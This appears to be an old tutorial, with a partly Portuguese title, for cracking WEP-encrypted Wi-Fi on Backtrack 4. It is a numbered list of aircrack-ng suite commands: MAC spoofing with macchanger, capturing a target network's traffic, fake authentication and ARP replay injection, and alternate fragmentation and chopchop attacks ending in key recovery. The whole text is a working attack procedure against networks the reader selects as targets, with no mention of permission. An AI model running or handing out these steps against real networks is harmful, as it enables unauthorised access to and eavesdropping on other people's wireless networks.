Backtrack 4

O usar Gerix Wifi Cracker















First, you will need to have Backtrack 4 BETA which can be found here.
I use the DVD version, I find it easier. After downloading and burning BT4, you will have to put the CD in your computer, then restart. It should automatically load BT4. You will then be asked to log in...
login: root
pass: toor

After logging in, type in: startx

After that, BT4 should be up and running. Read below to see what you have to do next.

-------------------------------------------------------------------------

NOTES

These are all different colors because they coordinate with parts of the code you will have to change when typing them.

wlan0 = Interface (Examples: wlan0, ath0, eth0)

ch = The channel the target is on (Examples: 6, 11)

bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)

ssid = Name of target (Examples: linksys, default)

filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)

fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)

PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
Ignore “:”

-------------------------------------------------------------------------

WEP CRACK GUIDE

1. Boot computer with Backtrack 4 (login: root , pass: toor / “poweroff” at end)
2. Open Konsole and type the following:
3. airmon-ng (You will find your Interface here)
4. airmon-ng stop wlan0 ***My interface is wlan0. It may be yours also. Replace all the wlan0 with your own interface!***
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Hit CTRL+C after finding WEP wanting to crack, then COPY THE BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Open new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Open new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap

-------------------------------------------------------------------------

ALTERNATE ATTACKS

FRAGMENTATION
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap

CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK

***Be sure to open new Konsoles when necessary***